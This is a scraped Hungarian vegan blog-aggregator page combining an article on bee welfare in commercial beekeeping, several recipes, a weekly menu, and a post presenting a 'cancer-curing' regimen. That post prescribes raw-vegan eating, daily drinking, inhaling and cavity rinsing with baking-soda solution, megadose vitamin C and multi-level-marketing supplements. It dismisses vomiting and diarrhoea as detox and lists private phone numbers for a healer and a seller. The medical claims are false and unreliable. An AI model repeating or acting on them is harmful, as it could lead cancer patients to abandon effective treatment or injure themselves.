A mesterséges szaporítás széleskörű elterjedése csökkenti a génvariabilitást, beltenyészet kialakulásához vezet. A nagy távolságról érkező állatokat postán adják fel a megrendelőnek. Szállítás közben az idegen zajok, szagok, rezgés, változó hő és páratartalom stresszforrás a rovar számára. Az anyásítás nem kis tortúra a méheknek, és az ,,öreg anya halálát jelenti.
Anyazárkában raboskodó anya
Bizonyos viselkedési formáik nem kívánatosak, ezért például megakadályozzák a család rajzását, mert az elrepülő raj dolgozói mézgyomrukban akár 60 dkg mézet is magukkal vihetnek, illetve termelés kiesést jelent a távozásuk. A rajzásgátlás módszerei: fészekhűtés, mézelvétel, az anya szárnyának csonkolása, anyátlanítás, vagy anyazárka használata, rajbölcsők 5-6 naponkénti elpusztítása. Emellett terjedőben van az anyahelyettesítő feromon kapszula, ami a családot a kaptárban tartja, de halálra is ítéli, mivel többé nem anyásítható, így szaporodásra képtelen.
Az anya szárnyának csonkolása mindennapos gyakorlat
Súlyos problémát okoz, hogy a nektár és pollen fogyasztásra adaptálódott méheket számukra értéktelen takarmányokkal táplálják. Cukoretetéssel, állatkísérletes, esetenként GMO-s méhtakarmánnyal,szójaliszttel, fölözött tejporral, húsliszttel, tojásporral pótolják az elrabolt mézet és a virágport. A pótszerek azonban hasmenést okoznak és utat nyitnak a fertőzéseknek. A cukor ráadásul üres kalóriákat tartalmaz, nincs benne semmi tápláló, a méhek számára olyan, mintha gyorsétellel etetnék őket.
2012. évi adatok szerint a méhészetek száma hazánkban: 20.410 db. Méhcsaládok száma: 1.088.590 db, ezt érdemes megszorozni átlagosan 40-50.000 egyeddel családonként, hogy hozzávetőleges becslésünk legyen a kaptárakban élő méhek számáról. Az EUban méhcsalád-sűrűség tekintetében 2. helyen állunk - 11 méhcsalád/Km2. A magyar méztermelés (20-25.000 tonna méz) 65-70%-át a vándorméhészetek termelik.
A monokultúrákra és a méz iránti kereslet növekedésére a kereskedelmi méhészet a hozamnövelő vándorméhészettel válaszol. Ez a kaptárak utaztatását jelenti a méhlegelők között. A szállítás stresszeli a méheket, a kaptár és a keretek, folyamatos rázkódása nyugtalanítja őket. A szakszerűtlen utaztatás: a szellőztetés és vízutánpótlás hiánya, túlmelegedés vagy baleset miatt a családok elpusztulhatnak, esetleg kiszabadulhatnak. A vándorlás ráadásul elősegíti a méhbetegségek terjedését.
A szintén kereskedelmi céllal működő bioméhészetek hasonló módon anyásítanak, vándoroltatnak. A kihasználás azzal a különbséggel történik, hogy kevesebb mézet vesznek el a méhektől, akiket részben saját mézzel és biocukorral etetnek. Antibiotikumok helyett természetes anyagok pl. hangyasav, oxálsav, tejsav, illóolajok használatával próbálják leküzdeni a méhbetegségeket.
A kolóniák nem csak kényszerűen vándorolnak, de ott vannak a kutató laboratóriumokban is. Számítógépek segítségével modellezik a viselkedésüket.Növényvédő szerek, méhtakarmányok hatását, idegrendszerüket,érzékelésüket, genetikai tulajdonságaikat vizsgálják, élveboncolást végeznek rajtuk.
Nem könnyíti meg a családok életét az sem, hogy a modern mezőgazdaság monokultúrákra és az I. világháborúban bevetett kémiai fegyverekből kifejlesztett növényvédő, rovarirtó szerekre épül. A vegyszerek megölik vagy legyengítik a méheket. Az abnormálisan magas méhsűrűség, a mesterségesen felduzzasztott, helyenként belterjes populációk fogékonyabbak a parazita fertőzésekre, amiket szintén vegyszerekkel kezelnek. A méhek sajátos genomjuk miatt korlátozottan képesek a toxinsemlegesítésre. Mivel minden szennyezőanyagot a kaptárba hordanak, ami a talajban, a vízben, növényekben található, vagy amivel kezelik őket, ezek termékeikben is megjelenhetnek. A méhpempőt és a mézet antibiotikumok, a viaszt atkaölők, a propoliszt atkaölők és ólom, a virágport peszticidek szennyezhetik.
A növényvédő szerek a méhek központi idegrendszerét támadják. Méhekre ragasztott rádióantennákkal követik a rovarok rendellenes mozgását
Világszerte tapasztalt tömeges pusztulásukért (kaptárelhagyási szindróma vagy CCD) elsősorban a növényvédő szereket, különösen a neonikotinoidokat tartják felelősnek. Azonban más faktorok is súlyosbítják a helyzetet, melyek mind az emberi beavatkozás következményei: virágzó növény nélküli területek, alultápláltság, parazita fertőzések, antibiotikum-használat, a vándorlás okozta stressz, és a monokultúrás növénytermesztés, mely 1-2 héten keresztül szolgál táplálékkal, az év többi részében élelmiszer sivatag a méhek és más beporzók számára.
Mit tehetünk a méhekért?
Legkézenfekvőbb az, ha nem vesszük el tőlük természetes táplálékukat és a többi méhterméket, ami egészségüket, túlélésüket biztosítja.
Pozitív változást hozhat, ha nem tekintjük nagyszámú, költöztethető, irányítható, profittermelő rabszolgának őket. Tudomásul kell vennünk, hogy a túlnépesedés miatt évről-évre több élelemre lesz szükségünk.
Élelmiszereink harmada beporzás nélkül nem terem meg. Bolygónk nagy részén a mézelő méhek átvették más beporzó rovarok szerepét. Mezőgazdaságunkat függővé tettük tőlük, miközben egyre több olyan módszert alkalmazunk, ami ellenük dolgozik.
Nem kérdés, hogy túlélésük érdekében csökkenteni kell a monokultúrás, vegyszerekkel mérgezett mezőgazdasági területeket.
Virágokban gazdag, biodiverzitást megőrző területeket kell kialakítanunk a városokban és a városokon kívül. Magad is ültethetsz nekik vadvirágokat, gyógynövényeket, rozmaringot, zsályát, citromfüvet. Hagyd a pázsit közt virágzani a martilaput, pitypangot, százszorszépet, lóherét, vörös herét.
Biztosíts sekély, tiszta vizet a kertedben, erkélyeden a vízgyűjtéshez.
Kerüld a növényvédő, rovarirtó szerek használatát a kertedben, ami a háziméheken kívül a vadon élő beporzókat is veszélyezteti.
Készíts rovarhoteleket, beporzóknak (vadméhek - különösen poszméhek, kőművesméh, molyok, bogarak, lepkék) és természetes kártevőirtóknak (katicák, fülbemászók,fátyolkák, poloskák, darazsak).
Rovarhotel
Szavazz a villáddal, támogass olyan élelmiszer termelő rendszert, ami segít táplálni, életben tartani a méheket, mint a vegyszermentes, organikus, diverzifikált farmok.
Végül fontold meg, hogy a méhek váladékának fogyasztása megéri-e a kaptárban élő haszonállatok szenvedését, pusztulását. Mi ugyanis képesek vagyunk életben maradni méz nélkül, de ők nem.
A cikket a Veganinja Magazin áprilisi számában publikáltam.
A "rákgyógyító" terápiánk
2015. április 18. Vegan Spirit
Édesapám történetéről már olvashattatok itt: http://veganspirit.blog.hu/2015/04/14/legyozi_a_rakot_a_nyersvegan_eletmod Most azt a terápiát osztom meg veletek, amit ő használ. Lelki okok: Minden betegésgnél, így a daganatos betegségek kezelésénél is nagyon fontos a lelki okok felkutatása, megértése, és elengedése! A felkutatásban az internet és önmagad ismerete, valamint a magunkhoz való teljes őszinteség segíthet. A feldolgozásban és elengedésben pedig a világ és önmagunk teljes elfogadása valamint a feltétel nélküli megbocsájtás és hála. Mindent olyannak elfogadni amilyen, és azért szeretni amiért olyan amilyen! Máskülönben a negatív érzelmi állapotok is a test folyamatos savasodását okozzák, ami ellen a testünknek egyfolytában küzdenie kell. Ez egyrészt leköti az immunrendszerünk kapacitásának jelentős részét, másrészt a savas közeg kedvez a ráknak és más betegségeknek, ami együtesen már sok a legyengült fizikai és érzelmi állapotú test számára! Az elsavasodást egyrészt a bevitt italok és ételek, másrészt a negatív érzelmi álllapot és az ahhoz kötődő gondolatok okozzák! Ezeket mind meg kell szüntetni. Nem szabad félni a jövőtől, hiszen minden betegség csak jelzés. Pontosan azért vannak ezek a betegségek, hogy jelezzék, nem azon az úton járunk, mely lelkileg és testileg számunkra élhető és ideális. Pusztán azt jelzik, hogy az, ahogyan eddig éltünk, az biztosan élhetetlen a jövőben. Ha megértjük ezt a jelzést, és az intésnek megfelelően változtatunk életmódunkon, gondolatainkon és érzelmeinken, akkor a betegség/jelzés okafogyottá válik és eltűnik. A lelki okok megszüntetésében sokat segíthet egy jó szakember. Mi egy jóbarátunk segítségét kértük, aki Reikivel (energetikai kezeléssel) és finom stresszoldással foglalkozik. Az ő engedélyével megosztom nevét és elérhetőségét is. Pápai Veronika, 06-70/428-0173 Két öngyógyító meditációt is rendszeresen végeztünk közösen: https://www.youtube.com/watch?v=QiqIHbjCZcM https://www.youtube.com/watch?v=m2ocCDNmtsQ Testi okok: Testi szinten is rengeteg dolog elősegíti a betegségek vagy jelzések kialakulását. Az egyik ilyen az állati termékek fogyasztása, és itt főként az álati fehérjék, túlzott zsír és cukor, valamint a rengeteg finomított, feldlgozott, hőkezelt ételre gondolok, melyek olyan messze állnak a természetes álapottól, hogy nem csoda, ha megbetegítik a testet. Fontos megérteni, hogy minden amit a modern ember eszik, gyakorlatilag természetellenes. Kerülnünk kell a rákosodásra hajlamosító állati fehérjék bevitelét, a finomított cukrot (Csak természetes cukortartalmú ételeket fogyasszunk!) és minden hozzáadott cukrot tartalmazó ételt, hiszen a cukor a rákos sejtek fő tápláléka! A magas zsírbevitel szintén kerülendő, hiszen gyulladáskeltő hatású. Ha meg akarunk gyógyulni, nem csak lelkileg kell élhető állapotba hozni magunkat, hanem testi szinten is! Ez pedig csak élő ételekkel lehetséges! Halott dolgokkal nem tudunk segíteni senkin, akinek az életre van szüksége! Mivel valószínűleg évtizedek óta savasodást okozó ételeket-italokat fogyasztunk, ezért lugosító hatású ételekt kell ennünk! Ajánlott tudományos irodalom, a világ legátfogóbb táplálkozástudományi tanulmánya, közérthető formában: Dr. T. Colin Campbell: A kína tanulmány http://www.libri.hu/konyv/thomas_m_campbell.kina-tanulmany.html Fél órás interjú Dr. T. Colin Campbellel a Kína tanulmányról, magyar felirattal: https://www.youtube.com/watch?v=enL1v9BMhnI Dr. Leonard Coldwell beszél a rák gyógyíthatóságáról és a táplálkozásról: https://www.youtube.com/watch?v=4saHaijltBw Étkezés: A kína tanulmány bebizonyította, hpgy az állati fehérjék fogyasztása erősen összefügg a daganatos betegségek kialakulásával! Éppen ezért k erülni kell minden állati fehérjét, így a megfelelő étrendnek törvényszerűen tisztán növényinek kell lennie! Ezzel együtt a Kína tanulmány által az is bizonyított, hogy semmilyen hiánybetegségtől nem kell tartanunk ha növényi étrendre térünk át! Ámde növényi, vagy vegán étrendből is van több féle. Mivel életbevágó, hogy az életet erősítsük magunkban, ezért a halott dolgok bevitelét is el kell hagyni, vagyis semmilyen hőkezelt étel fogyasztása nem ajánlott! A hökezelt növényi étrend megvéd ugyan attól, hogy állati fehérje kerüljön szervezetünkbe, ezzel pedig egy jelentős kiváltó okot kerülünk el, ámde a vitaminok és enzimek nélkül a növények is csak halott ásványi tápanyaggal látnak el minket! Minden hökezelési eljárás (párolás, főzés, sütés, fagyasztás) Megöli a növényeket, és tönkreteszi a növényekben található vitaminokat és élő enzimeket, melyekre ebben az álapotban testünknek leginkább szüksége van! A fenti elvek mentén a legideálisabb étrend a 100%-ban nyers, alacsony zsír és fehérje tartalmú növényi étrend! Ennek teljes betartása pedig vízválasztó lehet! Fontos hogy a nyers étkezésre való áttéréskor nagyon erős méregtelenítési folyamtok indulnak el a testben, amikor az évtizedek alatt lerakódott méreganyagok jelentős része hirtelen felszabadul a zsírszövetekből, és a kiürülés testi folyamatainak engedelmeskedve a véráramba kerül! Ez azt jelenti, hogy az első héten fejfájás, hányinger, erős hasmenés, levertség, és általános rosszullát jelentkezhet! Ettől nem szabadmegilyedni, mert természetes öntisztuló folyamatról van szó, mely általában 2-4 nap alatt elmúlik! Nagyon fontos, hogy minimum napi 3liter tiszta vizet igyunk, mert a méreganyagokat a vesénk csak megfelelő mennyiségű víz jelenléte mellett tudja kivákasztani a véráramból! Ajánlott irodalom: Dr Douglas N. Graham: 80-10-10 http://www.elixirbolt.hu/hu/webaruhaz/onismeret/801010 Szintén jó könyv még Victoria Boutenkótól a Nyers étel csodája, bár az étrend itt nem a 80-10-10 elveit követi, fontos, hogy mi aszerint étkezzünk! http://www.libri.hu/konyv/victoria_boutenko.a-nyers-etel-csodaja-1.html Táplálék kiegészítők/vitaminok és beszerzésük: Szódabikarbóna: A lúgosítást elősegithetjük például szódabikarbóna fogyasztásával. Ez az egyszerű anyag 250g-os kiszerelésben kapható bármely gyógyszertárban. Használatához 5 tömegszázalékos oldatot kell készítenünk belőle. Ennek módja, hogy 950g desztillált vízhez 50g szódabikarbónát keverünk. Ebből az oldatból minden reggel, éhgyomorra igyunk meg egy decit. Ha a tumor olyan helyen van, holy ezzel az oldatal akár részlegesen is elérhetjük, (pl tüdő, méh, végbél), akkor a testüreg öblögetése az oldattal, naponta 1-3 alkalommal ajánlott. Tüdődaganat esetén egy prolasztó inhalátorból lélegezzük be az oldatot 15-30 percen keresztül minden nap! Hetente két teljes fürdés ilyen oldatban szintén ajánlott. Nyugodtan üldögéljünk az oldatban! Ha anyagilag túl megterhelő ilyen mennyiségű szódabikarbóna beszerzése, akkor minimum öblítsük végig a testünket háromszor. Az öblítések között hagyjunk 1-3 perc szünetet. Ez 2 liter oldattal bőven kivitelezhető, és heti két alkalommal ismétlendő! Dr Tulio Simoncini beszél a rák szódabikarbónával történő gyógyításáról, és arról, hogy mi is a rák valójában: https://www.youtube.com/watch?v=B8T0uOuYyGw&feature=youtu.be&t=8m32s Aszkorbinsav: Szintén bármely gyógyszertárban beszerezhető 50g-os kiszerelésben. Napi 5g bevitele ajánlott! Célszerű turmixba tenni, hogy a természetes vitaminok, enzimek segítsék a tömény C-vitamin hasznosulását! A C-vitamin nagyon erős rákellenes szer, és ebben a mennyiségben komoly bajt nem okoz. A vesebetegeknek ajálott odafogyelni, mivel nagyon ritkán a vesekő kialakulását segítheti a nagy mennyiségű aszkorbinsav bevitel! Vesegörcs esetén csökkentsük a bevitelt arra a legmagasabb dózisra, ami még nem okoz görcsöt! Illetve ha bizonyos idő elteltével nő a vesék érzékenysége, akkor hagyjunk 2 hét pihenőt, mielőtt folytatnánk az aszkorbinsav emelt szintű fogyasztását. Kurkuma, gyömbér és fahéj: Mindhárom fűszernövény erős, rákellenes hatóanyagokat tartalmaz, így fogyasztásuk szintén ajánlott! A kurkumin felszívódását a feketebors és a chili paprika anyagai megsokszorozzák, ezért én a következő keveréket ajánlom: 10g kurkuma, fél kiskanál fekete őrölt bors, egy csipet őrölt chayenne bors (chili por). Ebből a keverékből 2 kiskanálnyit ajánlott fogyasztani egy pohár turmix mellé. A fahéjporból szintén 2 kiskanálnyi az ajánlott adag, de ezt csak akkor alkalmazzuk, ha az előbbi keveréket nem bírja a gyomrunk, mivel nincs annyira erős hatása, mint a kurkumás keveréknek! Zöld turmix alap recept: 2 alma, csak magozva, nem hámozva! 3 érett (barna foltos héjú) banán, 2 marék spenót levél, fél citrom leve, kisujjnyi darab gyömbér, fél mokkáskanál fahéj, 3dl víz, fél mokkáskanál aszkorbin sav. Fontosnak tartottuk, hogy a maximumra turbózzuk a vitamin és tápanyagbevitelt, ezért kifejezetten rákellenes és immunerősítő hatással bíró, táplálék kiegészítő termékeket is nagy mennyiségben fogyasztott édesapám. Mi a Forever Living Products termékeit használtuk a következő adagokban: Naponta 2x0,5dl aloe vera gél, 2x0,5dl pomesteen, 2x3 Lycium, 2x2 immublend. Ha nincs olyan személy, akin keresztül be tudod szerezni ezeket a termékeket, akkor itt az én kontaktom (nyugodtan kérj személyre szabott ajánlást!): Szabó Zsuzsanna, Telefon: 06-20/519-2149. Hivatkozz erre a blogbejegyzésre A terápia összefoglalva: - Dohányzás, alkohol, hús, tojás tejtermékek, és minden állati származék elhagyása - Nyers vegán, alacsony fehérje és zsír tartalmú étrend. -> 80-10-10 - Az első 3 nap csak zöld turmix! (Emésztőrendszer tisztítása, ezáltal a felszívódás javítása) Minden reggel 2dl, 5%os szódabikarbónás oldat elfogyasztásával indítottunk - 30 percel később 1 dl frissen préselt búzafű lé (Zöld árpafűlé is lehet, ez utóbbi nem okoz hányingert, a búzafűlé okozhat!) - Aztán minimum 30 perccel később elkezdtük a délelőtti zöld turmix fogyasztását. Minden délelőtt egy liter zöld turmixot ivott. (Bevált recept: 2 alma héjastól de kimagozva, 3 érett barna foltos héjú banán, 2 marék spenótlevél, fél citrom leve, 2-3dl víz, egy mokkás kanál őrölt fahéj, fél mokkáskanál "kb 2g" aszkorbinsav) - Napi 3 liter tisztított víz bevitele (frissen facsart citromlével és kevés aszkorbinsavval ízesítve) - Naponta összesen 5g aszkorbinsav, lehetőleg gyümölcsökkel együtt fogyasztva, hogy a természetes vitaminok, enzimek segítsék az aszkorbinsav felszívódását. Kevertük turmixba, vízbe. - Naponta egy kiskanál az alábbi keverékből: (10g kurkuma, fél kiskanál fekete őrölt bors, egy csipet őrölt chayenne bors.) - Naponta 15-30 perc inhalálás 5 tömegszázalékos szódabikarbónás vízes oldattal, inhalátorból! (A felmelegített oldat gőzének belégzése ebben az esetben nem hatásos!) - Hetente kétszer 5% szódabikarbónás oldatban való fürdés, hajmosás. (Nyugodtan lehet üldögélni az oldatban) Rendkívül fontos felismerni, hogy csak radikális és tartós életmód változás hozhat hosszútávú és gyors eredményt, ezért minimum a tisztán növényi, vegán étrend megtartása még a teljes gyógyulás után is ajánlott. A teljes gyógyulásig a szigorú nyers étrendet nem szabad fellazítani! Az itt olvasott tudás váljon egészségedre és boldoguláodra! További kérdésekre is szívesen válaszolok telefonon, mert az email-es kapcsolattartás nagyon sok időmet veszi el (rengeteg segítségkérő emailt kaptam), és nem tudok mindenkinek válaszolni. Szóban gyorsabb és pontosabb a kommunikáció. Ehhez kérlek a veganmoral@gmail.com emailcímre küld el kérdéseidet és telefonszámod. Amint tudlak, felhívlak! Légy Áldott! Üdvözlettel, Kakuk Bálint
„Lehetetlen étel”… ami finom – avagy fokhagymás mákfőzelék
Furcsán hangzik ez az ételpárosítás, de sokszor a legidegenebbnek vélt dolgokból születnek a legfinomabb ízcsodák.
Mákos dolgokat általában édesen fogyasztunk, a sós változatra csak kevesen vállalkoznak.
Trencsényi Tibor ezzel a különleges ételkölteménnyel lepett meg minket.
Elkészítés:
A megtisztított és karikákra vágott répát megfőzzük zöldségkockával ízesített lében (Na-glutamát mentes!), hozzáadjuk a mákot is. Míg fő, közben elkészítjük a rántást: kis olajon lisztet pirítunk, fokhagymával, köménnyel ízesítjük, majd a rántást a léhez adjuk. Összeforraljuk, és már kóstolhatjuk is.
A mákot a főzelékbe szórhatod egészben és őrölten is.
Fenti változatban nem őrölve szerepel, ízlés kérdése.
Köszönjük a receptet, Tibor!
Készítsétek el Ti is, és írjátok meg véleményeteket!
The post ,,Lehetetlen étel... ami finom - avagy fokhagymás mákfőzelék first appeared on Fitt Nők blog.
10+1 legfinomabb vegán salátaöntet
2015. április 15. Gréta konyhája
Hamarosan nyakunkon a friss saláta szezon, nem beszélve a bikini szezonról.
A saláta tökéletes táplálék, az ebédet, és a vacsorát is ezzel kellene kezdeni, de önmagában főételként is megállja a helyét. A saláta nem a cukros-ecetes paradicsomsaláta, vagy káposztasaláta, hanem az, amikor az otthon létező legnagyobb tálba, mindenféle ropogós friss zöldet összevágsz, csodás öntettel leöntöd, és kreatív, egyben egészséges hozzávalókkal tökéletesíted. Hogy senkinek ne legyen kifogása finom tavaszi salátákat enni, íme az általam legkedveltebb 11 salátaöntet, fogadjátok szeretettel!
I. Tartáros
3 ek veganéz (növényi majonéz)
fél citrom leve
1 gerezd fokhagyma
só, bors,
mustár
fűszerajánlatok: paprika, koriander, hagymapor, fokhagymapor, cayenne bors, majoránna, kapor, petrezselyem, friss koriander
II. Vinaigrette
1 rész extra szűz olívaolaj
1 rész balzsamecet
szójaszósz
agavé szirup
mustár
fűszerajánlatok: bors, friss bazsalikom, kapor, oregano, vegan parmesan (inaktív élesztőpehely)
III. Tahinis juharszirupos
2 ek tahini (szezámkrém)
2 ek juharszirup
3-4 citromlé, vagy almaecet
só
fűszerajánlatok: bors, fokhagymapor, curry
IV. ,,Mézes- mustáros
1 ek agavé szirup
2 ek dijon mustár
2 ek veganéz
1 narancs leve (opcionális)
ötletek: nagyon szuper bébi spenótra, ropogós zöldekre, rukkolára, római salátára, jégsalátára
V. Currys öntet
1 ek juharszirup
1 ek tahini
1 ek currypor
2 ek citromlé
ajánlatok: tökéletes kemény zöldségekkel, mint reszelt répa, zeller, kel, vagy sima káposzta, hagyma, rizs, bab, vagy sült tofukockák
VI. Zöld Istennő
fél érett avokádó
3-4 ek dióolaj
1 nagy citrom leve
1 nagy csokor aprított petrezselyem
1 tk fokhagymapor, vagy 1 gerezd préselt fokhagyma
só, bors,
opcionális. vegan majonéz (veganéz)
VII. Mogyorószósz:
2 ek mogyoróvaj (földimogyoró)
1 ek miso paszta
2 ek agavé szirup
1 dl szójatej
2 ek szójaszósz
ujjnyi reszelt gyömbér
ajánlatok: tökéletes rizssalátára, tofura, vagy tésztára
VIII. BBQ öntet
2 ek szójaszósz
5 ek ketchup
2 almaecet
2 gerezd préselt fokhagyma
3 ekolíva olaj
só, bors
1 tk füstölt paprika
ajánlat: tökéletes tofura, almával, szendvicsekbe
IX. Diópesztós
1/2 bögre dió
1 citrom leve
4 gerezd sült fokhagyma
2 ek olívaolaj
1 csokor bazsalikom
annyi víz, hogy öntetszerű legyen
ajánlatok: kombinálható, avokádóval, agavé sziruppal, vagy sajtosan vegan parmesannal(inaktív élesztő)
tökéletes zöldsalátákra, gyümölcsös zöldsalátákra, grillezett barackkal, almával, és grillezett zöldségekkel (antipasti)
X. Füstölt krémes
3 ek vegan majonéz
1 tk füstöltpaprika
1 ek agave szirup
1 citrom leve
1 dl szójatejszín (nem édes)
só, vegamix
ajánlat: tökéletes zöldekkel, sült tofu szendvicsben
+1 Cézár öntet:
1 bögre szójajoghurt
fél bögre veganéz
1 ek agave szirup
1 gerezd fokhagyma
1 citrom leve
só, bors, vegamix
ajánlat: ropogós zöldekkel, fokhagymás kenyérkockákkal, és sült tofukockákkal is isteni
Reggelire fel! - Sokmagos házi teljeskiőrlésű tönkölybúza kenyér (laktózmentes, vegán)
2015. április 14. Zöld Avocado
sokmagos házi teljeskiőrlésű tönkölybúza kenyérElérkezett ez a pillanat is! Megsütöttem életem első kenyerét! :-) Pár éve mikor divatba jöttek az otthon használatos kenyér sütők, én is szerettem volna egyet. De aztán elkezdtünk világot látni, és nem tűnt praktikus döntésnek egy kenyérsütővel a hónunk alatt költözgetni egyik országból a másikba. Így le is tettem az otthoni kenyérsütés öröméről. ;-) Most, pár évvel később, hogy nagy életmód váltásban vagyunk, és igyekszem a lehető legtöbb ételünket minél természetesebb, és egészségesebb módon idehaza elkészíteni, újra előkerült a házi kenyér gondolata. Úgy döntöttem, nem kell nekem kenyér sütő, menni fog ez anélkül is! Sőt! Még normális kenyér formájú sütő formám sincs itthon, de kit érdekel, hogy néz ki??? Az íze a lényeg, nemde?! ;-) Mint a korábban készített brokkolis sajtos krumpli, vagy a nemrégiben készített almás-fahéjas zabmorzsa ... és még sorolhatnám. Mindegyik Ronda, és finom! :-) Ugyan nem olyan laza, és puha a teljeskiőrlésű tönkölybúzából készült pékáru, mint egy hagyományos fehér kenyér, de annál sokkal egészségesebb, tápanyagban-, vitaminokban-, ásványi anyagokban- és rostban gazdag. Kisebb mennyiségben laktatóbb, és könnyedén bármikor elkészíthető ez a finom és telt házi magos kenyér. sokmagos házi teljeskiőrlésű tönkölybúza kenyér És hogy miért is jobb teljeskiőrlésű búzalisztet fogyasztani a hagyományos, olcsó, búzaliszt helyett? És mi az a tönkölybúza? Megtudhatjátok, a következő bekezdésekből. ;-) "Teljes kiőrlésű búzaliszt: A teljes kiőrlésű lisztekben a gabona korpája is megtalálható, amely tápanyagokban gazdag és segíti az emésztést. Használja egészsége érdekében sütéshez-főzéshez, akár finomliszttel fele-fele arányban keverve. A teljes kiőrlésű gabonákból készült termékek amellett hogy sok hasznos élelmi rostot, vitamint és ásványi anyagot (E-vitamin, B-vitamin, kálium, kalcium, magnézium, foszfor) tartalmaznak, segítenek megelőzni a rák, a cukorbetegség és a szívbetegségek kialakulását is. Sokan nem szeretik a csak teljes kiőrlésű gabonából készült kenyereket, mert enyhén savanykás az ízük. Ők nyugodtan fogyasszanak olyan kenyeret ami részben készül teljes kiőrlésű lisztből, részben pedig fehér lisztből. Tönkölybúza liszt: A tönkölybúza kiváló beltartalmi és élettani hatású gabona. A tönkölybúzából készült termékek pozitív jelentőségűek. A jobb életminőség fenntartása érdekében fogyasszunk minél több természetes eredetű élelmi anyagot. Fehérjetartalma magas és könnyen emészthető. Aminosav-tartalma és annak összetétele a gabonafélék közül a legkedvezőbb. A vitamin- és ásványianyag-tartalma a közönséges búzához képest annak többszöröse." Forrás:Bioliget.hu sokmagos házi teljeskiőrlésű tönkölybúza kenyér HOZZÁVALÓK: - 300 g teljeskiőrlésű tönkölybúza liszt - 300 g (glutén mentes) élesztős fehér liszt - 1 tasak instant élesztő por - 100 g sós mag mix (napraforgó, tökmag, szezámmag, lenmag, kendermag, mák stb. keveréke) - 2 tk himalája só - 200 ml kézmeleg víz - 200 ml langyos rizs tej - 1 tk demerara cukor vagy jó minőségű barna cukor ELKÉSZÍTÉS: Kenyeret készíteni, egyáltalán nem bonyolult, csak időigényes. A liszteket, az élesztőt, és a sót összekeverem kézzel, hogy levegő jusson a tésztába. Hozzáadom a magokat, de 1 marékkal félre teszek későbbre. A tészta alapanyag közepébe lukat formázok, és beleöntöm a langyos tejet. Hozzáadom az édesítőt, és elkezdem kézzel összedolgozni a tésztát. Közben hozzá adagolom a kézmeleg vizet. Az egészet egy nyálkás tésztává ,,dagasztom kézzel. Ha kell még vizet, vagy lisztet teszek hozzá, annak függvényében, hogy milyen állagú a tészta. Könnyed, nyúlós kelt tésztát kellene kapnunk. Persze nem olyan könnyedet, mint egy hagyományos fehér lisztes kelt tésztánál, de azért próbálkozzunk. ;-) Ha készen vagyunk konyharuhával letakarva a sütőbe tesszük, egy alsó rácsra. Közben bekapcsoljuk a sütőt 50°C fokra (nem kell előmelegíteni), és 60 percre bent hagyjuk a tésztát melegedni. Félidőben kivesszük, és egy kicsit kézzel meglazítjuk a tésztát, majd visszatesszük a mesterséges ,,napra. Természetesen ha szerencsénk van, és odakint süt az igazi nap, akkor spórolhatunk az árammal, és kitehetjük a tésztát egy ablak párkányba, vagy a teraszra. A nyers tészta is boldogabb lesz a természetes napfénytől! ;-) Miután letelt az 1 órás sütős szauna, kiveszem a tésztát, és átteszem a végső formájába. Ez lehet egy szilikonos kenyérforma, vagy akár egy hosszúkás sütő forma papírral bélelve. Nekem egyik sincs itthon, így kerestem egy méretre megfelelő jénait, kibéleltem a sütőpapírral, és beletettem a kelt tésztát. Kicsit eligazgattam, hogy kenyér formája legyen, megszórtam a korábban félretett mag-mixel, és bevagdostam a tetejét. Letakarva visszatettem a már lekapcsolt -de még langyos- sütőbe az így kapott végleges tésztát még egy fél órára kelni. Miután ez a fél óra is lejárt, levettem a konyharuhát, bekapcsoltam a sütőt 200°C fokra, és fél órára betettem sülni a kenyeret, hogy most már tényleges ehető formáját is elérje. Ennyi! Ugye, hogy nem bonyolult, csak időigényes?! ;-) Nem lett tökéletes, de az, hogy mind elfogyott, és nem a kukában landolt, jelent valamit. Persze azért még majd próbálkozom egyéb receptekkel is, és ha találok valami jót, akkor megosztom veletek is. sokmagos házi teljeskiőrlésű tönkölybúza kenyér, házi brokkoli krémmel Jó étvágyat hozzá! Megjegyzés1: a sok sós mag, ami a kenyér belsejében van morzsalékosabbá teszi a beltartalmat, hisz térfogat foglalók, így a kenyér tészta nem tud összeállni egyneművé. Ha ez zavar, akkor rakj kevesebb magot a tésztába, vagy daráld le amilyen kicsire csak tudod. Mi szeretjük rágcsálni a sós magokat, így minket a kenyérben sem zavart. :-) sokmagos házi teljeskiőrlésű tönkölybúza kenyér Megjegyzés2: Hogy mennyi mindenre használjuk mi magyarok a kenyeret, és milyen elképesztő kenyéfeltétekkel lehet találkozni más országokban, bővebben olvashattok egy korábbi bejegyzésben itt a Zöld Avocadón.
4. heti menü
2015. április 14. Mindennapi ételeink
Bocsánat, kicsit csúszva írom a menüt, de ami késik, nem múlik :-) de jó hír, hogy itt a tavasz :-) HÉTFŐ R: Édes, sütőben sült vegán bundás kenyér, kiwi, lekvár E: Paradicsomos krumplifőzelék, "töltlék" V: Ebédmaradék KEDD R: Köleskása, dió/mák, szederlekvár, alma E: Lencsehurka, édesburgonyapüré, uborkasaláta V: Ebédről maradék SZERDA R: Kenyér, tofukőrözött E: Brokkoli krémleves, krumplis tészta V: Ebédről maradék CSÜTÖRTÖK R: Hajdinakása (reszelt almával), gesztenyepüré, meggybefőtt E: Csőben sült répa-cukkini, párolt kuszkusz, paradicsomsaláta tofuval V: Ebédről maradék PÉNTEK R: Tejbegríz, lekvár, banán E: "Lucskos káposzta" pászkagombóccal V: Főtt krumpli, hagyma, növényi tejföl, olívaolaj, újhagyma, retek SZOMBAT R: Granola müzli, növényi tej, banán, E: "Lucskos káposzta" pászkagombóccal, zabkeksz V: Kifli, virsli, mustár, saláta, paradicsom VASÁRNAP R: Zabkása, mandarin, olajos mag E: Gulyásleves, palacsinta (mákos, diós, növényi túrós) V: Zsemle, kókuszzsír, diókolbász, mustár
Diós kókuszos árpapehely granola
2015. április 13. Zizi kalandjai
Kamra takarítást tartottam. Volt itthon zabpehely is, de ebből csináljuk a reggeli kásánkat, így inkább a maradék, ritkán használatos árpapelyhet használtam ehhez a granolához. Kiváló lett vele. Próbáljátok ti is ki! Az árpapehely igen gazdag élelmirostban, ennek köszönhetően tisztán tartja a beleket és a gyomrot, továbbá csökkenti a koleszterin szintet. Javasolt a fogyasztása várandós és szoptatós kismamák részére, továbbá erős fizikai igénybevétel alkalmával.
